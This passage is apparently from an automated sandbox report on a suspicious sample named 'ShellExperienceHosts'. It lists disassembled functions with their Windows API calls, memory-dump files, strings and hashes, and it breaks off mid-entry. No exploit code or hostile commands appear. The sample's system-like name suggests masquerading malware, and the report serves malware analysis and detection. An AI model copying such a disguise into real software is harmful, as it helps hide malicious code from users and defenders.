                                                                            • Instruction ID: 0b733d2ffc2dcd82724ad45accd6e11457bf5542e5b9fa3b0dab8e66aef8b916
                                                                            • Opcode Fuzzy Hash: 1122f4f54b269b74ba04a8b3f7160fa86554315ec262b143ee05eec6d6d4246e
                                                                            • Instruction Fuzzy Hash: ABC12975A01619AFCF15DFA4C984AEEBBBABF49314F10411AE816E7350DB30AE05CF94
                                                                            Function 10002140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 10001610: __vswprintf.LIBCMT ref: 10001646
                                                                            • _malloc.LIBCMT ref: 10002330
                                                                              • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                                              • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                                              • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap__vswprintf_malloc
                                                                            • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                            • API String ID: 3723585974-868042568
                                                                            • Opcode ID: 5cf1fff9a3ed07831e4285ee8707500ca474442d0b2f18c7a61f986e26f0da37
                                                                            • Instruction ID: eab6198d38b35a21c7eee27abceaedf30942dd101684ecb5fd47972168577aa1
                                                                            • Opcode Fuzzy Hash: 5cf1fff9a3ed07831e4285ee8707500ca474442d0b2f18c7a61f986e26f0da37
                                                                            • Instruction Fuzzy Hash: A4B19075A002059BEB08CF68D8806AE7BE5FF44390F1546AEED499B34ADB31ED45CB90
                                                                            Function 6C6FC474 Relevance: 10.8, APIs: 7, Instructions: 260COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C6FC47B
                                                                            • InflateRect.USER32(?,?,00000000), ref: 6C6FC50F
                                                                            • InflateRect.USER32(?,000000F6,00000000), ref: 6C6FC524
                                                                            • InflateRect.USER32(?,00000000,000000FD), ref: 6C6FC5F4
                                                                            • InflateRect.USER32(?,?,?), ref: 6C6FC609
                                                                            • GetTextColor.GDI32(?), ref: 6C6FC674
                                                                            • Polygon.GDI32(00000000,?,00000003), ref: 6C6FC6C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: InflateRect$ColorH_prolog3_PolygonText
                                                                            • String ID:
                                                                            • API String ID: 2032528157-0
                                                                            • Opcode ID: 6d12fc8fe6e0ab3f10bc137a7005dabe9a3d24b53910986cb3c70e9fe5a528b2
                                                                            • Instruction ID: b3843f58323c9fd7c15593f9111a760586e4c1f77d486c0e2775fbd427ab11e9
                                                                            • Opcode Fuzzy Hash: 6d12fc8fe6e0ab3f10bc137a7005dabe9a3d24b53910986cb3c70e9fe5a528b2
                                                                            • Instruction Fuzzy Hash: C9A16071E01119EFCF15DFA8C8449EDBBB6FF49314F14422AF926AB284CB719906CB94
                                                                            Function 6C70AFC8 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C70AFCF
                                                                              • Part of subcall function 6C770D49: GetParent.USER32(?), ref: 6C770D57
                                                                              • Part of subcall function 6C770D49: GetParent.USER32(?), ref: 6C770D6A
                                                                              • Part of subcall function 6C770D49: GetParent.USER32(?), ref: 6C770D84
                                                                              • Part of subcall function 6C770D49: SetFocus.USER32(?,00000000,?,6C6B1C04,?), ref: 6C770D9D
                                                                            • GetClientRect.USER32(?,?), ref: 6C70AFF3
                                                                            • SetCapture.USER32(?), ref: 6C70B022
                                                                              • Part of subcall function 6C70CAD9: IsRectEmpty.USER32(?), ref: 6C70CB00
                                                                              • Part of subcall function 6C70CAD9: InvertRect.USER32(?,?), ref: 6C70CB0E
                                                                              • Part of subcall function 6C70CAD9: SetRectEmpty.USER32(?), ref: 6C70CB1E
                                                                            • SetCapture.USER32(?), ref: 6C70B075
                                                                            • PtInRect.USER32(00000040,?,?), ref: 6C70B159
                                                                            • GetCapture.USER32 ref: 6C70B183
                                                                            • ReleaseCapture.USER32 ref: 6C70B18D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Capture$Parent$Empty$ClientFocusH_prolog3_InvertRelease
                                                                            • String ID:
                                                                            • API String ID: 636197404-0
                                                                            • Opcode ID: 0b7dd039a70cf7bbe463cd56a19704efdba7b72c1295ae958513cd0da24c8a6e
                                                                            • Instruction ID: 8083ad3b2786dd4f7231e583959ef9870dd1f40ea4d575df589e83170d71371b
                                                                            • Opcode Fuzzy Hash: 0b7dd039a70cf7bbe463cd56a19704efdba7b72c1295ae958513cd0da24c8a6e
                                                                            • Instruction Fuzzy Hash: 59816BB1B01219DFCF15DFB4CA88AAD7BB5BF49308F104169E826AB750CB31EA05CB54
                                                                            Function 10001830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _free.LIBCMT ref: 10001878
                                                                            • _free.LIBCMT ref: 100018B6
                                                                            • _free.LIBCMT ref: 100018F5
                                                                            • _free.LIBCMT ref: 10001935
                                                                            • _free.LIBCMT ref: 1000195D
                                                                            • _free.LIBCMT ref: 10001981
                                                                            • _free.LIBCMT ref: 100019B9
                                                                              • Part of subcall function 10006E49: HeapFree.KERNEL32(00000000,00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006E5F
                                                                              • Part of subcall function 10006E49: GetLastError.KERNEL32(00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000), ref: 10006E71
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                            • Instruction ID: a8bd5bf31f2101c09de15a5e31c6c05fc03f2a154fed00425f0cdbd26510a762
                                                                            • Opcode Fuzzy Hash: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                            • Instruction Fuzzy Hash: 9C511C76A00211CFE704DF58C5D4899BBE6FF89294726C0ADD5096B326CB32BD42CB91
                                                                            Function 6C71C838 Relevance: 10.6, APIs: 7, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C76E63F: __EH_prolog3_catch.LIBCMT ref: 6C76E646
                                                                            • UpdateWindow.USER32(?), ref: 6C71C8E5
                                                                            • EqualRect.USER32(?,?), ref: 6C71C925
                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 6C71C93D
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C71C94C
                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 6C71C963
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C71C975
                                                                            • UpdateWindow.USER32(?), ref: 6C71C97E
                                                                              • Part of subcall function 6C71B09D: InvalidateRect.USER32(?,?,00000001,?), ref: 6C71B114
                                                                              • Part of subcall function 6C71B09D: InflateRect.USER32(?,00000000,?), ref: 6C71B15A
                                                                              • Part of subcall function 6C71B09D: RedrawWindow.USER32(?,?,00000000,00000401), ref: 6C71B16E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$InflateInvalidateWindow$Update$EqualH_prolog3_catchRedraw
                                                                            • String ID:
                                                                            • API String ID: 1041772997-0
                                                                            • Opcode ID: b8a2dac41ff3f54d550f7d3fb414c52a592ef9523841b51202dcc49adbf0b6d8
                                                                            • Instruction ID: ee4877188ce04eb29008a35a056651a72439c31dcf3a79ef476a8ed533c006b8
                                                                            • Opcode Fuzzy Hash: b8a2dac41ff3f54d550f7d3fb414c52a592ef9523841b51202dcc49adbf0b6d8
                                                                            • Instruction Fuzzy Hash: 195184756002069FCF04DF64C988BAE3BB5BF49319F140279EC1AEB695DB719D01CBA0
                                                                            Function 6C74CF4B Relevance: 10.6, APIs: 7, Instructions: 142windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C7A89B1: IsWindow.USER32(00000000), ref: 6C7A89D0
                                                                            • IsWindowVisible.USER32(00000000), ref: 6C74CF9B
                                                                            • IsWindowVisible.USER32(00000000), ref: 6C74CFB6
                                                                            • IsWindowVisible.USER32(00000000), ref: 6C74D016
                                                                            • IsWindowVisible.USER32(00000000), ref: 6C74D04C
                                                                            • IsWindowVisible.USER32(00000000), ref: 6C74D05F
                                                                            • IsZoomed.USER32(00000000), ref: 6C74D08C
                                                                            • GetSystemMetrics.USER32(00000004), ref: 6C74D0FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Visible$MetricsSystemZoomed
                                                                            • String ID:
                                                                            • API String ID: 890500415-0
                                                                            • Opcode ID: c91236f97e45efccf148aa66cae194a7de5f491db4c9c19c65134d05e6ead1fa
                                                                            • Instruction ID: 3a31a874f9723ced8471cd479eff8d1498f60e27ae6d903412c3b7b81ced17ae
                                                                            • Opcode Fuzzy Hash: c91236f97e45efccf148aa66cae194a7de5f491db4c9c19c65134d05e6ead1fa
                                                                            • Instruction Fuzzy Hash: 6151A030B00206DFDB01DF65CA48BA9B7F5BF1834AF148179D865D7A61DB70E842CB95
                                                                            Function 6C724A18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C724A1F
                                                                              • Part of subcall function 6C6E2C90: __EH_prolog3.LIBCMT ref: 6C6E2C97
                                                                              • Part of subcall function 6C6E2C90: GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C724A58
                                                                            • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C724AE1
                                                                            • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 6C724AFB
                                                                              • Part of subcall function 6C6E2A7E: SelectObject.GDI32(?,!+nl), ref: 6C6E2A87
                                                                            • FillRect.USER32(?,00000000,-00000098), ref: 6C724B46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Create$Compatible$BitmapFillH_prolog3H_prolog3_ObjectRectSectionSelectWindow
                                                                            • String ID: (
                                                                            • API String ID: 2680359821-3887548279
                                                                            • Opcode ID: 4e056af99c48f571620a0f30cf3b6edd3378584b380e260d54d5d2595cd9948d
                                                                            • Instruction ID: cc88e79229783d8c5947fec4c6d58a78a6bed9af3893060117f92daf7266955d
                                                                            • Opcode Fuzzy Hash: 4e056af99c48f571620a0f30cf3b6edd3378584b380e260d54d5d2595cd9948d
                                                                            • Instruction Fuzzy Hash: EB511771D052189BDB14CFE4CA49BEEBBB5FF08304F10412EE415AB690DB74A909DF54
                                                                            Function 6C84CDB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C84CDE7
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C84CDEF
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C84CE78
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6C84CEA3
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C84CEF8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: 70931ccd263e7c95ff5e6ad29549dca2e18a4359c1b164add79c2d6b2ad64505
                                                                            • Instruction ID: 07c5f38a9d8c3d4719c96317254abb25c5f4d5e81f9f253cb9188602a845ba1f
                                                                            • Opcode Fuzzy Hash: 70931ccd263e7c95ff5e6ad29549dca2e18a4359c1b164add79c2d6b2ad64505
                                                                            • Instruction Fuzzy Hash: 4041C974A0121DABCF20DF69C940A9EBBB5AF46318F24C975E8145BB52D731DE09CBD0
                                                                            Function 6C74AFC1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 6C74AFF8
                                                                            • IsWindow.USER32(?), ref: 6C74B2A5
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C74B2E2
                                                                            • OffsetRect.USER32(?,?,?), ref: 6C74B2F2
                                                                            • CopyRect.USER32(?,?), ref: 6C74B308
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: RectWindow$CopyInfoOffsetParametersSystem
                                                                            • String ID: ,
                                                                            • API String ID: 1377071818-3772416878
                                                                            • Opcode ID: 286cc5ef0a36bda5a9af3944d983be7eb21e6062f72e49b1627db44664fd75c0
                                                                            • Instruction ID: 766ea1a2f1ceb81c4e48fa71cbc72dfc74fa0d12a762d4cbb4cc970216028b56
                                                                            • Opcode Fuzzy Hash: 286cc5ef0a36bda5a9af3944d983be7eb21e6062f72e49b1627db44664fd75c0
                                                                            • Instruction Fuzzy Hash: CA315D71B00609ABDF18DBA9DA48FAEB7B9FF88219F10417AE515D7650DB30ED04CB90
                                                                            Function 02239A9D Relevance: 10.6, APIs: 7, Instructions: 109memorythreadCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(10015EB4,?,022375B9,10017B60,00000008,0223774D,?,?,?,10017B80,0000000C,02237808,?), ref: 02239AA5
                                                                            • __mtterm.LIBCMT ref: 02239AB1
                                                                              • Part of subcall function 0223977C: RtlDecodePointer.NTDLL(100191C8), ref: 0223978D
                                                                              • Part of subcall function 0223977C: TlsFree.KERNEL32(100191CC,0223767C,02237662,10017B60,00000008,0223774D,?,?,?,10017B80,0000000C,02237808,?), ref: 022397A7
                                                                            • TlsAlloc.KERNEL32(?,?,022375B9,10017B60,00000008,0223774D,?,?,?,10017B80,0000000C,02237808,?), ref: 02239B3E
                                                                            • __init_pointers.LIBCMT ref: 02239B63
                                                                            • __calloc_crt.LIBCMT ref: 02239BD1
                                                                            • GetCurrentThreadId.KERNEL32 ref: 02239BFD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm
                                                                            • String ID:
                                                                            • API String ID: 3766280069-0
                                                                            • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                            • Instruction ID: c095cb93813fd9da96a4b804a9b3931815fcf7b2f715d25b5c02600d5d8fd52a
                                                                            • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                            • Instruction Fuzzy Hash: D0314EB1950E35EAF722AFB48C887553EE6EB4A365B188516E414D72B4FB71C0C1CF50
                                                                            Function 6C6E64A1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C6E64AB
                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 6C6E6505
                                                                            • IsAppThemed.UXTHEME(?,?,00000001,?), ref: 6C6E6596
                                                                            • GetStockObject.GDI32(00000005), ref: 6C6E65A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClassH_prolog3_NameObjectStockThemed
                                                                            • String ID: Button$Static
                                                                            • API String ID: 2434646892-2498952662
                                                                            • Opcode ID: 8e72177156069195adde10abc9bc5264a0738c74bf55a85df6c5eec076831f20
                                                                            • Instruction ID: 781ef7990f4dfe82eeacac45a330c9a71e7980bd8eea1efa93ee13528f0e2b3e
                                                                            • Opcode Fuzzy Hash: 8e72177156069195adde10abc9bc5264a0738c74bf55a85df6c5eec076831f20
                                                                            • Instruction Fuzzy Hash: 5B31E271A4A21DDBDF24CF54C948BD97370AF19318F1042AA9619DBAC1DB30EA84CF69
                                                                            Function 6C7EA81F Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C7EA826
                                                                              • Part of subcall function 6C7EA910: __EH_prolog3.LIBCMT ref: 6C7EA917
                                                                              • Part of subcall function 6C7EA910: GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6C7EA96A
                                                                              • Part of subcall function 6C7EA910: GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6C7EA980
                                                                            • CopyRect.USER32(?,?), ref: 6C7EA85B
                                                                            • GetCursorPos.USER32(?), ref: 6C7EA86D
                                                                            • SetRect.USER32(?,?,?,?,?), ref: 6C7EA880
                                                                            • IsRectEmpty.USER32(?), ref: 6C7EA89B
                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 6C7EA8AD
                                                                            • DoDragDrop.OLE32(00000000,00000000,?,?), ref: 6C7EA8F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
